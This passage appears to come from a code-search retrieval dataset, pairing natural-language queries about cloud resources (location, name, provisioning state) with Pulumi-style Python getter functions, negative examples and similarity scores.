"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def network_fabric_controller_id(self) -> str:\n return pulumi.get(self, \"network_fabric_controller_id\")",
"def resourceid(self):",
"def sql_virtual_machine_group_resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"sql_virtual_machine_group_resource_id\")",
"def parent_cluster_resource_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"parent_cluster_resource_id\")",
"def storage_resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"storage_resource_id\")",
"def getMcc3Id(self):\n return self._base.getMcc3Id()",
"def id(self): \n if self.cloudnet:\n return self.cloudnet.id\n else:\n return None",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def namespace_id(self) -> str:\n return pulumi.get(self, \"namespace_id\")",
"def database_id(self) -> str:\n return pulumi.get(self, \"database_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def slb_id(self) -> str:\n return pulumi.get(self, \"slb_id\")",
"def target_resource_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"target_resource_id\")",
"def target_resource_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"target_resource_id\")",
"def cal_guid(self):\n return 'setup' + str(self.id) + '@lnldb'",
"def id(self) -> str:\n\n return self._inst.query('*IDN?')",
"def unique_id(self) -> str:\n return pulumi.get(self, \"unique_id\")",
"def get_id(self):\n if not self.nccl_id:\n logger.warning(\"The NCCL ID has not been \"\n \"set yet for store {}.\".format(self.name))\n return self.nccl_id"
] | [
"0.8125011",
"0.639748",
"0.639748",
"0.639748",
"0.6284943",
"0.6265004",
"0.62123185",
"0.617114",
"0.617114",
"0.617114",
"0.617114",
"0.617114",
"0.6158674",
"0.60937095",
"0.60937095",
"0.6091811",
"0.6091811",
"0.6091811",
"0.60563904",
"0.60457486",
"0.5990473",
"0.5979375",
"0.59711367",
"0.5962884",
"0.5938235",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.5891642",
"0.58725715",
"0.5865841",
"0.5865841",
"0.58452266",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.57935536",
"0.57935536",
"0.5793322",
"0.5793322",
"0.5785437",
"0.5774641",
"0.5774483",
"0.57647943",
"0.5748912",
"0.57442796",
"0.5741626",
"0.5724627",
"0.5717584",
"0.5717369",
"0.5704724",
"0.5704724",
"0.5704724",
"0.57012415",
"0.56968486",
"0.56968486",
"0.56968486",
"0.56968486",
"0.56968486",
"0.56872606",
"0.56858325",
"0.5676404",
"0.5668158",
"0.5667462",
"0.5666045",
"0.56643575",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.56503826",
"0.56264055",
"0.5621662",
"0.5621662",
"0.5621662",
"0.5621662",
"0.5621106",
"0.5614265",
"0.5614265",
"0.56135184",
"0.56134295",
"0.5609916",
"0.56079584"
] | 0.82438326 | 0 |
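The row above concerns an ARM-style resource ID (the Network Fabric l3IsolationDomain ID). As a hedged sketch, not part of the dataset, here is one way such an ID could be split into its segments with plain string handling; ARM IDs alternate key/value path segments, and the example below names are illustrative only.

def parse_arm_resource_id(resource_id: str) -> dict:
    # ARM IDs look like:
    # /subscriptions/<sub>/resourceGroups/<rg>/providers/<namespace>/<type>/<name>
    parts = [p for p in resource_id.split("/") if p]
    pairs = dict(zip(parts[0::2], parts[1::2]))
    return {
        "subscription_id": pairs.get("subscriptions"),
        "resource_group": pairs.get("resourceGroups"),
        "name": parts[-1] if parts else None,
    }

# Illustrative usage on a made-up ID:
# parse_arm_resource_id("/subscriptions/000/resourceGroups/rg1/providers/Microsoft.ManagedNetworkFabric/l3IsolationDomains/dom1")
# -> {"subscription_id": "000", "resource_group": "rg1", "name": "dom1"}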
The geolocation where the resource lives | def location(self) -> pulumi.Output[str]:
return pulumi.get(self, "location") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_location(self):\n\t\treturn self.location",
"def get_location(self):\n return self.location",
"def get_location(self):\n return self.location",
"def get_location(self):\r\n return self.__location",
"def get_location(self):\r\n return None",
"def getLocation(self):\n return self._Location",
"def geolocation(self):\n return self.get_property('geolocation', GeolocationColumn())",
"def location(self):\n return self.geometry.location",
"def location(self):\n self.manager.refresh_client()\n return self.content[\"location\"]",
"def location(self):\n return self._location",
"def location(self):\n return self._location",
"def get_current_locate(self) -> dict:\r\n geolocate: dict = self.gmaps.geolocate()\r\n return geolocate",
"def geolocation(self):\n if self.latitude and self.longitude:\n return self.longitude, self.latitude",
"def Lokation(self):\n return self.getMylocation()",
"def location(self):\r\n return self._get('location', {})",
"def get_location(self) -> tuple:\n return self.__location",
"def location(self) -> object:\n return self._location",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def getLocation(self):\n send_url = 'https://ipinfo.io'\n r = requests.get(send_url)\n resp = json.loads(r.text)\n logging.info(\"GeoLoc: {}\".format(resp))\n return resp",
"def location(self):\n return self.properties.get(\"location\", Location())",
"def geo(self):\n return self.query.geo",
"def location(self) -> Object:\n return self._location",
"def locate(self):\n if self.location == '':\n return None\n if self.coords is not None:\n return self.coords\n\n loc = urlencode({'address': self.location})\n urldoc = urlopen(User._GMAP_URL.format(query=loc))\n jsObj = json.loads(urldoc.readall().decode('utf-8'))\n if len(jsObj['results']) > 0:\n # discard commercial results\n locTypes = jsObj['results'][0]['address_components'][0]['types']\n if not 'premise' in locTypes and not 'route' in locTypes and not 'establishment' in locTypes and not 'subpremise' in locTypes:\n self.coords = jsObj['results'][0]['geometry']['location']\n return self.coords\n # still here? it's all rubbish\n return None",
"def get_location(self):\n return self.request({\n \"path\": \"/\" + UUID + \"/location\"\n })",
"def m_location_get(self) -> Point:\n pass",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def get_current_location(self):\n return self.enu_2_local()",
"def location(self) -> str:\n return self._location",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def get_location(self) -> models.Location:\n return models.Location.get(region=self, name=self.name, deleted=False)",
"def get_location(self) -> Union[str, None]:\n return self._get_location()",
"def location(self) -> str:\n return self.metadata.location",
"def get_location(self):\r\n response = self.connection.make_request('GET', self.name,\r\n query_args='location')\r\n body = response.read()\r\n if response.status == 200:\r\n rs = ResultSet(self)\r\n h = handler.XmlHandler(rs, self)\r\n xml.sax.parseString(body, h)\r\n return rs.LocationConstraint\r\n else:\r\n raise self.connection.provider.storage_response_error(\r\n response.status, response.reason, body)",
"def location(self):\n if \"location\" in self._prop_dict:\n if isinstance(self._prop_dict[\"location\"], OneDriveObjectBase):\n return self._prop_dict[\"location\"]\n else :\n self._prop_dict[\"location\"] = Location(self._prop_dict[\"location\"])\n return self._prop_dict[\"location\"]\n\n return None",
"def get_relative_location(self):\n http = urllib3.PoolManager()\n url = 'http://ipinfo.io/json'\n response = http.request('GET', url)\n soup = BeautifulSoup(response.data, features=\"html5lib\")\n soup = str(soup).split(\"body\")[1][1:-2]\n try:\n soup = ast.literal_eval(soup)\n self.ip_addr = soup['ip']\n self.location = soup['loc']\n except Exception as e:\n print(\"Approximate address can not be determined...\")\n self.ip_addr = None\n self.location = None",
"def cal_location(self):\n return self.location.name",
"async def location(self):\n if not hasattr(self, \"_location\"):\n self._location = await Stack.fetch_stack_value(self, \"http://usefulinc.com/ns/doap#location\", await self.uuid)\n return self._location",
"def location(self):\r\n try:\r\n return self.data['location']\r\n except KeyError:\r\n return self.data['station_name']",
"def get_location(self):\n return self._overridden_location or self.get_default_location()",
"def get_location(self, ip_address):\n location = None\n url = \"http://dazzlepod.com/ip/{0}.json\".format(ip_address)\n status_code, json_data = self.urlopen(url)\n if status_code == 200 and json_data:\n tmp_location = json.loads(json_data)\n if 'latitude' in tmp_location and 'longitude' in tmp_location:\n location = tmp_location\n return location",
"def get_location(self):\n # h = b'\\r\\nAT-MSGEO\\r\\r\\n-MSGEO: -3936,3464,-3612,7402d50c\\r\\n\\r\\n'\n # an example of the string returned from the AT-MSGEO used for testing.\n h = self.acquire_response(b'AT-MSGEO')\n if isinstance(h, bytes):\n h = h.decode('utf-8')\n h = h.strip()\n h = h.split(':')\n h = h[1].split(',')\n x = int(h[0])*1000 # Convert coordinates to meters.\n y = int(h[1])*1000\n z = int(h[2])*1000\n else:\n print('Location not available')\n\n # 'geocent' refers to the geo-centered frame that the co-ordinates are returned in\n inProj = Proj(proj='geocent', ellps='WGS84', datum='WGS84')\n\n # 'latlong' is the frame to be converted to\n outProj = Proj(proj='latlong', ellps='WGS84', datum='WGS84')\n\n # Convert X, Y, Z to latitude, longitude and altitude\n long, lat, alt = transform(inProj, outProj, x, y, z, radians=False)\n # l = [str(long), str(lat), str(alt)]\n return long, lat, alt",
"def get_current_location(self):\n return self._current_loc",
"def founding_location(self) -> object:\n return self._founding_location",
"def _get_location(self):\n return industry.Location(itemID=self.locationID, flagID=self.locationFlagID, ownerID=self.ownerID, typeID=self.locationTypeID)",
"def get_geolocation(self, location):\n\n response = self.request(dict(\n method=\"GET\",\n query=dict(location=location),\n ))\n\n return response['data']",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def user_place(self):\n place = self.status.user['location']\n return place",
"def location_a(self):\n return self._location_a",
"def location_info(self) -> LocationInfoIm:\n return self._location_info",
"def location(self) -> Optional[str]:\n raise NotImplementedError()",
"def _get_current_location(self):\n return self.get_queryset().filter(status=self.model.CURRENT).first()",
"def location(self) -> str:\n\t\tind = self._raw_result['locationIndex']\n\t\tif ind > -1 and ind < len(self._client.locations):\n\t\t\treturn self._client.locations[ind]['name']\n\t\treturn \"\"",
"def location_hint(self) -> str:\n return pulumi.get(self, \"location_hint\")",
"def location(self):\n return self.element.location",
"def Loc(self):\n return self.Localize",
"def returncarlocation(self):\n retrieved_location = self.update_car_location()\n if retrieved_location:\n self.currentcar_location[\"Longitude\"] = retrieved_location[\"Longitude\"]\n self.currentcar_location[\"Latitude\"] = retrieved_location[\"Latitude\"]\n self.currentcar_location[\"Time\"] = datetime.now()\n return self.currentcar_location",
"def location(self) -> CameraLocationType:\n return self._location",
"def location(self):\n return [self.lat, self.lon]",
"def get_player_location(self):\n return self.player.location",
"def location(self):\n if self.scoping:\n return self.scoping.location\n else:\n return None",
"def location(self, time: int) -> Location:\n self.refreshDroneStatus(time)\n return self.__location",
"def cal_location(self):\n return self.setup_location.name",
"def get_pokemon_location(self):\n return self._pokemon_location",
"def locations(self):\r\n return resource.Location(self)"
] | [
"0.816298",
"0.7999453",
"0.79540074",
"0.7945644",
"0.78364915",
"0.77626437",
"0.7730134",
"0.7681095",
"0.7624169",
"0.76093256",
"0.76093256",
"0.75724584",
"0.75544393",
"0.7547195",
"0.75165695",
"0.74507827",
"0.74267685",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7406362",
"0.7359666",
"0.73106575",
"0.7298844",
"0.72935575",
"0.72554076",
"0.7220563",
"0.72126144",
"0.72126144",
"0.72126144",
"0.718496",
"0.7151951",
"0.710894",
"0.710894",
"0.710894",
"0.7102068",
"0.7084974",
"0.70708954",
"0.7024406",
"0.70236313",
"0.7014063",
"0.69928896",
"0.69530916",
"0.69379604",
"0.6935117",
"0.69253886",
"0.6905298",
"0.690296",
"0.6884053",
"0.68591607",
"0.6844422",
"0.68391085",
"0.68391085",
"0.68391085",
"0.68391085",
"0.6816552",
"0.67645866",
"0.6751419",
"0.67463267",
"0.67445743",
"0.6738971",
"0.67155385",
"0.67094636",
"0.6681957",
"0.66757774",
"0.66720206",
"0.666216",
"0.66248953",
"0.6623208",
"0.6617238",
"0.66021705",
"0.66020995",
"0.65998936"
] | 0.6883943 | 75 |
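Several of the snippets in the row above return a (latitude, longitude) pair rather than a region name. As a small, hedged sketch unrelated to any specific snippet in the dataset, the standard haversine formula gives the great-circle distance between two such pairs; the Earth radius constant (mean radius, 6371 km) is an assumption of the sketch.

import math

def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    # Great-circle distance on a sphere of radius 6371 km.
    phi1, phi2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(phi1) * math.cos(phi2) * math.sin(dlmb / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))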
The name of the resource | def name(self) -> pulumi.Output[str]:
return pulumi.get(self, "name") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_resource_name(self):\n return self._resource_name",
"def name(self):\n return self.raw_resource[\"name\"]",
"def resource_name(self) -> Optional[str]:\n return pulumi.get(self, \"resource_name\")",
"def resource_name(self) -> Optional[str]:\n return pulumi.get(self, \"resource_name\")",
"def name(self):\n\n return self.resource[\"metadata\"][\"name\"]",
"def resource_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_name\")",
"def resource_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_name\")",
"def resource_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_name\")",
"def resource_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_name\")",
"def resource_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_name\")",
"def __str__(self):\n return self.resource.__name__",
"def get_objectName(self):\n return self.resource.get_name()",
"def resource_prefix(self):",
"def ResourcePath(self, name):\n pass",
"def subresource_name(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"subresource_name\")",
"def name(self) -> str:\n pass",
"def name(self) -> str:\n pass",
"def name(self) -> str:\n pass",
"def name(self) -> str:\n pass",
"def name(self) -> str:\n ...",
"def name(self) -> str:\n ...",
"def resource(self):\n return str(self._resource)",
"def getName():",
"def getName():",
"def getName():",
"def getName():",
"def getName():",
"def getName():",
"def name(self):\n\t\treturn self.asset.name",
"def get_resource_name(self, name):\n return super(KeyVaultTestCase, self).get_resource_name(\"livekvtest{}\".format(name))",
"def name(self) -> str:",
"def name(self) -> str:",
"def name(self) -> str:",
"def name(self) -> str:",
"def name(self) -> str:",
"def name(self):\n pass",
"def subresource_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subresource_name\")",
"def subresource_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subresource_name\")",
"def get_name(self) -> str:\n pass",
"def name() -> str:\n pass",
"def name(self):\n if self.resource.is_client:\n return f\"{self.network.name} {self.resource.name_connection_type} {SWITCH_TYPES[self.variable][0]}\"\n elif self.resource.is_eero or self.resource.is_profile:\n return f\"{self.network.name} {self.resource.name} {SWITCH_TYPES[self.variable][0]}\"\n return f\"{self.resource.name} {SWITCH_TYPES[self.variable][0]}\"",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")"
] | [
"0.8592593",
"0.8411918",
"0.8165518",
"0.8165518",
"0.8104756",
"0.7934077",
"0.7934077",
"0.7934077",
"0.7934077",
"0.7934077",
"0.76977456",
"0.758492",
"0.7497908",
"0.7401931",
"0.73212445",
"0.73001647",
"0.73001647",
"0.73001647",
"0.73001647",
"0.7297593",
"0.7297593",
"0.72648084",
"0.72442645",
"0.72442645",
"0.72442645",
"0.72442645",
"0.72442645",
"0.72442645",
"0.72179496",
"0.72178596",
"0.71673316",
"0.71673316",
"0.71673316",
"0.71673316",
"0.71673316",
"0.71463805",
"0.71410644",
"0.71410644",
"0.7136878",
"0.70834124",
"0.7079713",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005",
"0.7075005"
] | 0.0 | -1 |
The provisioning state of the L3 network. | def provisioning_state(self) -> pulumi.Output[str]:
return pulumi.get(self, "provisioning_state") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> str:\n return pulumi.get(self, \"provisioning_state\")",
"def get_provisioning_state(self):\n url = \"/api/v1/machine/{}\".format(self.machine_id)\n return self.urlhandler.get(url)",
"def provisioning_state(self) -> Optional[str]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[str]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[str]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[str]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[str]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[pulumi.Input[Union[str, 'ProvisioningState']]]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning_state(self) -> Optional[pulumi.Input[Union[str, 'ProvisioningState']]]:\n return pulumi.get(self, \"provisioning_state\")",
"def provisioning(self):\n return self.properties.get('provisioning',\n EntityCollection(self.context, ProvisioningObjectSummary,\n ResourcePath(\"provisioning\", self.resource_path)))",
"def get_state(self):\n\t\treturn Job(SDK.PrlVm_GetState(self.handle)[0])",
"def state(self):\n return {\n 'network': self._network,\n 'target_network': self._target_network,\n 'optimizer': self._optimizer,\n 'num_steps': self._num_steps\n }",
"def status(self):\n return self.microblaze.state",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def provisioning_status_message(self) -> str:\n return pulumi.get(self, \"provisioning_status_message\")",
"def network_state(self):\n states = {\n 0: \"NETWORK_EMPTY\",\n 1: \"NETWORK_IDLE\",\n 2: \"NETWORK_LOADING\",\n 3: \"NETWORK_NO_SOURCE\",\n }\n return states[self._el._parent.execute_script(\"return arguments[0].networkState\", self._el)]",
"def network_state(self):\n states = {\n 0: \"NETWORK_EMPTY\",\n 1: \"NETWORK_IDLE\",\n 2: \"NETWORK_LOADING\",\n 3: \"NETWORK_NO_SOURCE\",\n }\n return states[self._el._parent.execute_script(\"return arguments[0].networkState\", self._el)]",
"def initial_state(self):\n # Network details elided.\n return self._agent.initial_state()",
"def provisioning_state_transition_time(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"provisioning_state_transition_time\")",
"def initial_state(self):\n # Network details elided.\n return self.agent.initial_state()",
"def initial_state(self):\n # Network details elided.\n return self.agent.initial_state()",
"def initial_state(self):\n # Network details elided.\n return self.agent.initial_state()",
"def state(self):\n\t\tif self._state in JOB_PS:\n\t\t\treturn JOB_PS[self._state]\n\t\telse:\n\t\t\treturn str(self._state)",
"def state(self):\n result = self.getResult()\n return result.state",
"def status(self):\n return self.state",
"def state(self):\n return self.coordinator.data[PVS_DEVICE_TYPE][self.base_unique_id][PVS_STATE]",
"def state(self):\n return pn_link_state(self._impl)",
"def get_state(self):\n\t\treturn call_sdk_function('PrlVmInfo_GetState', self.handle)",
"def updateState(self):\n self.state = self.microgridPolicy.computeState();",
"def state(self):\n data = self.coordinator.data[self._host_name][self._node_name][self._vm_id]\n if data[\"status\"] == \"running\":\n return STATE_ON\n return STATE_OFF",
"def get_net_state(self):\n json_ns_state = {}\n if (len(self.veth_peers) != 0):\n json_ns_state = {\n \"veth\": \"veth0\",\n \"namespace\": self.veth_peers[0],\n \"peer\": self.veth_peers[1],\n \"ip\": self.veth_peers[2],\n \"mac\": self.veth_peers[3]\n }\n\n json_host_state = {\n \"id\": self.id,\n \"ip\": self.ip,\n \"mac\": self.mac,\n \"veth\": json_ns_state\n }\n return json.dumps(json_host_state)",
"def status(self):\n return {\n 'id': 'status',\n 'protocol_version': 'PV62',\n 'network': self.origin_node.network.name,\n 'td': self.origin_node.chain.head.header.difficulty,\n 'best_hash': self.origin_node.chain.head.header.hash,\n 'genesis_hash': self.origin_node.chain.genesis.header.hash,\n 'size': kB_to_MB(self._message_size['status'])\n }",
"def state(self):\n return self.status",
"def state(self):\n return self.device.status(station=self.station_number)",
"def state(self):\n return self._node._state",
"def state(self):\n return self.get_state()",
"def status(self):\n return dict(price_data=self.price_data,\n profit_data=self.profit_data,\n next_network=self.next_network,\n current_network=self.current_network)",
"def state(self) -> 'outputs.DeviceStateResponse':\n return pulumi.get(self, \"state\")",
"def state(self):\n return self.device.value()",
"def state(self):\n msg = f\"Procs: {self.running_procs} / {self.procs_no}\"\n if self.gpus:\n msg += f\" | {len(self.gpus):d} GPUS:\"\n for gpu in self.gpus:\n msg += f\" {gpu}:{self.gpu_running_procs[gpu]}/{self.per_gpu[gpu]};\"\n return msg",
